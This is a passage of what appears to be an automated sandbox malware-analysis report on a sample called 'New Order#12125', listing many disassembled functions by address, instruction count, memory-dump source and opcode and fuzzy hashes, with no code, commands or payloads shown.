                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40765a1a3eb584a53e0c2a48eb61d8c5019a368776e56ac065ca145a1d48b5fd
                                                                        • Instruction ID: d21e537b794dbd3402381626c514cf4aae5adad5fc4260781e792e4f047dd29e
                                                                        • Opcode Fuzzy Hash: 40765a1a3eb584a53e0c2a48eb61d8c5019a368776e56ac065ca145a1d48b5fd
                                                                        • Instruction Fuzzy Hash: 17910031A006168FFB279B68C481B7EBBE5FB94714F068469ED059F288E774D901C7A1
                                                                        Function 01534750 Relevance: .3, Instructions: 251COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                        • Instruction ID: a3e2f3a7794bb1aa0adb69bd6f57e44d68e56a91370973c239f291d803385e38
                                                                        • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                        • Instruction Fuzzy Hash: 22812C32A042968FDB224EACD8C226DFFA5FF92210F184A7AD5429F341C674DD46D791
                                                                        Function 0154DBF9 Relevance: .2, Instructions: 244COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                        • Instruction ID: fbae839b267c02e02c882bbd1febc46eee508ab242da890ca2c3c9ae03d800fa
                                                                        • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                        • Instruction Fuzzy Hash: 49913172610A068FE735CF6DC889666BBF0FF65328B148A19D5E6DF6A0C375E521CB00
                                                                        Function 015CF7B0 Relevance: .2, Instructions: 242COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6df7084bce695f1e3806c138dac636eab194221f43b758a2e438aa47f39e3fba
                                                                        • Instruction ID: 801b3253539f8ec006d741fe3ca48e6a8165506e69cce8ee50ab90a810ed84d6
                                                                        • Opcode Fuzzy Hash: 6df7084bce695f1e3806c138dac636eab194221f43b758a2e438aa47f39e3fba
                                                                        • Instruction Fuzzy Hash: E391C031A00216AFEB15CFA8C8807AFBBE2BF84710F15856EE955DF281D774E901CB90
                                                                        Function 015CF43F Relevance: .2, Instructions: 241COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54ed2a2c00c972236ac3d38ca7e06b34b253d74334928580ce8acd10ffbdc341
                                                                        • Instruction ID: b588552bc1dee53043244b48f5666f8e855ebc3947fa2eab26a95b04e0a31586
                                                                        • Opcode Fuzzy Hash: 54ed2a2c00c972236ac3d38ca7e06b34b253d74334928580ce8acd10ffbdc341
                                                                        • Instruction Fuzzy Hash: 0291BE72A001159FDB18CF69C8906BEBBF2FF88310B1A866ED815DF295D634D945CB50
                                                                        Function 015C81CC Relevance: .2, Instructions: 232COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4692f1d4be8033a6883aaf9c0b46c4b6b8157e1ab353aad5e3b6152d9c8252df
                                                                        • Instruction ID: e25a3b5bca253473ff23a0c27d7a9debe2f8004299fda82a464fb6ea0217d0fd
                                                                        • Opcode Fuzzy Hash: 4692f1d4be8033a6883aaf9c0b46c4b6b8157e1ab353aad5e3b6152d9c8252df
                                                                        • Instruction Fuzzy Hash: 3E81B471E005169FCB14CFADC8845AEB7F2FF88A14B15462ED921EB290D774E951CB90
                                                                        Function 01510E59 Relevance: .2, Instructions: 231COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 780f6761b5bd4aa189ccfddca674b994bdc009ba7e7ec054f767f14cfa05d35d
                                                                        • Instruction ID: 91a36007e13e5232bf1362248849514ef7cf7b904a2b22dbd3ec4f6596f13346
                                                                        • Opcode Fuzzy Hash: 780f6761b5bd4aa189ccfddca674b994bdc009ba7e7ec054f767f14cfa05d35d
                                                                        • Instruction Fuzzy Hash: 1881B535A005199FEB16CF6DC8809AEBBF2FFC5250B248295F9549F389D730E981CB90
                                                                        Function 01556ACC Relevance: .2, Instructions: 226COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: df3a2e48e7e44778b52446d90f726487821ab52b12e8f52035dd8aa508f26f92
                                                                        • Instruction ID: 1f4df94eb8e9a7970be1e3779817408248073ad1e2653a9915af0ce6f653a730
                                                                        • Opcode Fuzzy Hash: df3a2e48e7e44778b52446d90f726487821ab52b12e8f52035dd8aa508f26f92
                                                                        • Instruction Fuzzy Hash: D081B471E006569FDB58CF69C850ABEBBF9FB48710F44852EE845DB640E734D940CBA4
                                                                        Function 015BE4F6 Relevance: .2, Instructions: 224COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 163206642c2a27d2078a59ad6a48ddcc2f7724722646e4e3de1a6120b8e85bbe
                                                                        • Instruction ID: fa5db11d953e099005c567800a0d7ec243b9b77e37bf6ccde125f9e4071be643
                                                                        • Opcode Fuzzy Hash: 163206642c2a27d2078a59ad6a48ddcc2f7724722646e4e3de1a6120b8e85bbe
                                                                        • Instruction Fuzzy Hash: CA817D76A002159BDB28CFA8C591AEDFBF1FF89310B19816AD816EF385D634DD41CB90
                                                                        Function 015CAB40 Relevance: .2, Instructions: 222COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                        • Instruction ID: dccf4d6da52c9d5c16543cfee48b5a96c690412c6526886cb737d129442f0835
                                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                        • Instruction Fuzzy Hash: C2816035A0020A9FDF19CF98C890AAEBBF6BF84714F14856DD9169F345EB74E901CB50
                                                                        Function 0153E284 Relevance: .2, Instructions: 212COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb9840759e62c97a10282d280ce946b18d6f410667bfc23c00e1b7e68d783e93
                                                                        • Instruction ID: 45c81765de8e5479a074de7543ad5742262d55e7cfaecaf3e9d5cff6c6c9c453
                                                                        • Opcode Fuzzy Hash: fb9840759e62c97a10282d280ce946b18d6f410667bfc23c00e1b7e68d783e93
                                                                        • Instruction Fuzzy Hash: 4981637190060AEFDB26CFA9D881BEEBBF9FF88354F144429E555AB250D730AC45CB60
                                                                        Function 0152B950 Relevance: .2, Instructions: 209COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b0f4728ddc4c48331c5fac30079f71a5bab12e3c59308ce5ba077de61a6eb451
                                                                        • Instruction ID: d8296c61d8840c0bbeff5519b98f5d000254b248866556023ba99b007839f300
                                                                        • Opcode Fuzzy Hash: b0f4728ddc4c48331c5fac30079f71a5bab12e3c59308ce5ba077de61a6eb451
                                                                        • Instruction Fuzzy Hash: 4A7125363002618EE724CF2AC98173A77E2FB86705F54895DE996CF2C5C775E802CBA0
                                                                        Function 0151C640 Relevance: .2, Instructions: 206COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c4143f6a405a2abd6925126b1b7963f9e6ab8b4416161e5ededba9b5648dac91
                                                                        • Instruction ID: b8aba04c09566042b21454bd66c5a253530f6a60052bd03ba9372b2f636ea58d
                                                                        • Opcode Fuzzy Hash: c4143f6a405a2abd6925126b1b7963f9e6ab8b4416161e5ededba9b5648dac91
                                                                        • Instruction Fuzzy Hash: A071B9B58006299FDB268F58D9907BEBBF4FF68710F14451AE952AF354D371A804CBE0
                                                                        Function 015B47A0 Relevance: .2, Instructions: 202COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 323d9c7c3bce31558599cbd4201c3f100c859e065dae29796c11e6605c718808
                                                                        • Instruction ID: 2311904ec8f41bf0855d3ecade71c65d573e4751ac90b25f2eaea9eae4d90195
                                                                        • Opcode Fuzzy Hash: 323d9c7c3bce31558599cbd4201c3f100c859e065dae29796c11e6605c718808
                                                                        • Instruction Fuzzy Hash: C8717E70900245EFDB30DFA9DA80A9EBBF9FB90300F11815EE621EF29AD7719944DB54
                                                                        Function 0151260B Relevance: .2, Instructions: 201COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd90547c9c733ed3b133ffadd685265b38e679b67176042976108e371d2f1392
                                                                        • Instruction ID: b2fd88da98c1777f35ac44df615f94334413ed937616ecef80eed31c152f7698
                                                                        • Opcode Fuzzy Hash: bd90547c9c733ed3b133ffadd685265b38e679b67176042976108e371d2f1392
                                                                        • Instruction Fuzzy Hash: EE71B2356046428FE316DF28C480B6AB7E5FF84310F1589AAE899CF39ADB34DC45CB91
                                                                        Function 015C70E9 Relevance: .2, Instructions: 201COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c42f4711b1043bc84a296baf9e3797ac110c957e3d63fee55b797fac69adf1f
                                                                        • Instruction ID: 1025e3b66d90a77fe19f8c29997e4266595b9d37d3ae158137758e74e547bba9
                                                                        • Opcode Fuzzy Hash: 1c42f4711b1043bc84a296baf9e3797ac110c957e3d63fee55b797fac69adf1f
                                                                        • Instruction Fuzzy Hash: F261C871E002179FDB15AEE9C8859BFB7BABF98A00F10442DE9119F640EB74DA41CF90
                                                                        Function 015BF0CC Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cee13445cf9ea138a612add4fd36295baa6f80224dd9c8b2a54dea1576bc7489
                                                                        • Instruction ID: 64c9740ba7edcc3fe1dcc05f2f2a91909244f412fcd2ee07438f1ac1c2951db7
                                                                        • Opcode Fuzzy Hash: cee13445cf9ea138a612add4fd36295baa6f80224dd9c8b2a54dea1576bc7489
                                                                        • Instruction Fuzzy Hash: 54716779A01622DBDB24CF5AC8C01BEF7F1BB85704B65486FD9929F240D370E991DBA0
                                                                        Function 0158035C Relevance: .2, Instructions: 198COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                        • Instruction ID: c00fea075e875d066248d061fb9d582614ad7beb276bdd98fd322c25d87d422e
                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                        • Instruction Fuzzy Hash: 13718271A0061AEFDB11EFA9C944EDEBBB9FF84314F104569E545BB290DB30EA05CB50
                                                                        Function 015962A0 Relevance: .2, Instructions: 198COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1085a6a253e663ada55b3c5009d71926d85cdb279bd302de605eaccb19fdba8a
                                                                        • Instruction ID: 56bf8257d2771df004d75b40289fd2cc12be007adbd2a175662b2f7dc04da5fa
                                                                        • Opcode Fuzzy Hash: 1085a6a253e663ada55b3c5009d71926d85cdb279bd302de605eaccb19fdba8a
                                                                        • Instruction Fuzzy Hash: 6971F531100B02AFEB32DF58C894F5ABBE6FF80764F154918E2598F2A1D775E948CB51
                                                                        Function 015C7A46 Relevance: .2, Instructions: 193COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4a2194d3b09efe2a16c201426a773cb7810b0884aa82de52c0d127303383c666
                                                                        • Instruction ID: dfb273f25ebb1660b286fabc4457e09f72b6979051e2800e5a09366e3a6dd5cc
                                                                        • Opcode Fuzzy Hash: 4a2194d3b09efe2a16c201426a773cb7810b0884aa82de52c0d127303383c666
                                                                        • Instruction Fuzzy Hash: 7A513875A001265FCB149FADC880ABEBBE2FB8CA14F15415DE955DF784EA34C942CBA0
                                                                        Function 015D8324 Relevance: .2, Instructions: 192COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b94b3b9de66574dd7b8d1cae283cddcb21fb421902c8f9314b0091464973ba7
                                                                        • Instruction ID: 633d590aa9d424fe56ba62d95fb3c1b2e10fecef6d88748848576030cadfd750
                                                                        • Opcode Fuzzy Hash: 6b94b3b9de66574dd7b8d1cae283cddcb21fb421902c8f9314b0091464973ba7
                                                                        • Instruction Fuzzy Hash: 05710B71E0021ABFDB26DF98CC41FEEBBB8FB44354F104559E614AA290D774AA45CBA0
                                                                        Function 015C132D Relevance: .2, Instructions: 188COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3097d90dc9448d7d48a40e6830bccb604f64374c9d7b97d0d1b413c7ebb8360
                                                                        • Instruction ID: c1007895021979fdc3ba06ad93829d19217647c65a07a63edb4360bc5c03e47c
                                                                        • Opcode Fuzzy Hash: f3097d90dc9448d7d48a40e6830bccb604f64374c9d7b97d0d1b413c7ebb8360
                                                                        • Instruction Fuzzy Hash: 78815A75A00606DFCB09CFA8C590AAEBBF1FF98300F1581ADD859AB355D734EA51CB90
                                                                        Function 015BA250 Relevance: .2, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 620a0bcd9c620a3146ae5378db879646e229eb12d6fa677e101892aafa755620
                                                                        • Instruction ID: bcd785b058a64c29fbc3dbcd46a8308b516e1bc22f153fc600b891310c0f1b77
                                                                        • Opcode Fuzzy Hash: 620a0bcd9c620a3146ae5378db879646e229eb12d6fa677e101892aafa755620
                                                                        • Instruction Fuzzy Hash: AF51BF72504712AFD712DE68C884E9BBBE8FBC5754F010929BA40DF150E774ED05C7A2
                                                                        Function 015CCE93 Relevance: .2, Instructions: 172COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                        • Instruction ID: b80a2ee86b1ac2a72814a62e1bd7e996f11231189f9c7669f512e7811101584a
                                                                        • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                        • Instruction Fuzzy Hash: 265114326046034FD711DFAD885076FBBE6BFD1A50F19846DE9A9CF246DA30D8058B91
                                                                        Function 015A8350 Relevance: .2, Instructions: 161COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6e2c04fbf301e62105b2fb1700b533438236e108587b3ffbea4edb9bc117bc48
                                                                        • Instruction ID: bf4d22e8c5d79e0748bf635ce1a66d10b619cfc57e4140e60c1ebad90ec62a46
                                                                        • Opcode Fuzzy Hash: 6e2c04fbf301e62105b2fb1700b533438236e108587b3ffbea4edb9bc117bc48
                                                                        • Instruction Fuzzy Hash: 8C51C170940706DFD721DF9AC880AAFFBF8BF94714F504A1EE2929B6A0D7B0A545CB50
                                                                        Function 0153E443 Relevance: .2, Instructions: 158COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2601e580780944cf90c61fac0b928b417575962968ce17a7c6095bd79fe26689
                                                                        • Instruction ID: 8dc871f220657634a7424cf7cb645f75561c40f93d58fb48f5cfae3c7a81af84
                                                                        • Opcode Fuzzy Hash: 2601e580780944cf90c61fac0b928b417575962968ce17a7c6095bd79fe26689
                                                                        • Instruction Fuzzy Hash: 91519F71200A06DFDB22EF69D991F6AB3F9FF98758F410829E5519B260E730ED50CB60
                                                                        Function 015A4180 Relevance: .2, Instructions: 156COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 491c07cc96dfb0d6601f06ab8d3e87f79742322be4b53d8604d22cd4b914decb
                                                                        • Instruction ID: 4f1facb0bd46896bc8c434cae3201775e0d97e7965c1402f950111e60178cea3
                                                                        • Opcode Fuzzy Hash: 491c07cc96dfb0d6601f06ab8d3e87f79742322be4b53d8604d22cd4b914decb
                                                                        • Instruction Fuzzy Hash: BF5189716483029FD750DF69C880A6FBBE5BFC8208F88492EF589CB250EB70D945CB52
                                                                        Function 015245B1 Relevance: .2, Instructions: 156COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                        • Instruction ID: cd9a3bb8c00edde19235c65bbd9074ccbd7c5672893f626b3a7bff7c34c0929a
                                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                        • Instruction Fuzzy Hash: 53517172E0022A9BDF15DF94C440BEEBBB9BF46754F044069EA11AF280D774DD45CBA0
                                                                        Function 0157D800 Relevance: .2, Instructions: 155COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 93bdd4dfbb760ed9eab62819147a9195b2bf55798cb154f34fd31b1322f185d6
                                                                        • Instruction ID: 5e045764216b682cb2b144a4a94c7397795f869e8fcb318a6390d1885d887024
                                                                        • Opcode Fuzzy Hash: 93bdd4dfbb760ed9eab62819147a9195b2bf55798cb154f34fd31b1322f185d6
                                                                        • Instruction Fuzzy Hash: 0251CE71A00216ABDB14DFADD481ABEBBF5FF85700B0441AAE985DF680E734D950CBA0
                                                                        Function 0158E9E0 Relevance: .2, Instructions: 154COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                        • Instruction ID: 62a0e998f047abf0d74e9cb75f770d37bd9dda34116eae1e597bc8dfc9961e8d
                                                                        • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                        • Instruction Fuzzy Hash: 6E51B531D0021AEFEF21BA94C886BAEBBB5FB40725F154665E9127F190D7709E418BA0
                                                                        Function 015C7571 Relevance: .2, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b9f8ff8d5effb1c459b826697c362f1181f9edcef4a69dd8fd58d55891882d16
                                                                        • Instruction ID: 247d973061760ee53dc75183550419047b75e6a849202b07efddb61e23a228b7
                                                                        • Opcode Fuzzy Hash: b9f8ff8d5effb1c459b826697c362f1181f9edcef4a69dd8fd58d55891882d16
                                                                        • Instruction Fuzzy Hash: ED510431A0011A9FCB159FA8C844A7EBBF5FF88744F05412DE911DB680DB70AE45CF80
                                                                        Function 015C8B28 Relevance: .2, Instructions: 152COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e501e72eba3b2f379cc0609539aa793b521a5b5aff05fc58419eec8737110a87
